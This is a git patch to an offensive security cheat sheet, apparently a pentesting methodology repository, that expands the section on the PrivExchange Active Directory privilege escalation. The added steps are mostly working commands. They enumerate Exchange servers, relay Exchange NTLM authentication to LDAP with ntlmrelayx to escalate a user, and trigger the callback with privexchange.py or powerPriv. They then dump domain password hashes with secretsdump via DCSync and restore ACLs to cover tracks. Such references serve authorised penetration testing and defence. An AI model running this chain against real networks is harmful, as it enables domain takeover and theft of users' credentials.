From 859695e2be23a8bdd9ec42a38077f696f8295e64 Mon Sep 17 00:00:00 2001 From: Swissky Date: Wed, 24 Jul 2019 14:10:58 +0200 Subject: [PATCH] Update PrivExchange based on chryzsh blog post --- .../Active Directory Attack.md | 37 ++++++++++++++++--- 1 file changed, 31 insertions(+), 6 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0d8388e..17d5c8e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -741,22 +741,46 @@ Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HAC ### PrivExchange attack -Exchange your privileges for Domain Admin privs by abusing Exchange. -You need a shell on a user account with a mailbox. +Exchange your privileges for Domain Admin privs by abusing Exchange. +:warning: You need a shell on a user account with a mailbox. + + +1. Exchange server hostname or IP address + + ```bash + pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username + ``` + + +2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket). + + ```powershell + ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username + ``` + + +3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine. -1. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. ```bash # https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx + python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange # https://github.com/G0ldenGunSec/PowerPriv powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016 ``` -2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket). -3. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash +4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash + ```bash python secretsdump.py xxxxxxxxxx -just-dc + python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm + ``` + +5. Clean your mess and restore a previous state of the user's ACL + + ```powershell + python aclpwn.py --restore ../aclpwn-20190319-125741.restore ``` Alternatively you can use the Metasploit module @@ -847,4 +871,5 @@ Most of the time the best passwords to spray are : * [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) * [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) * [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence) -* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) \ No newline at end of file +* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) +* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/) \ No newline at end of file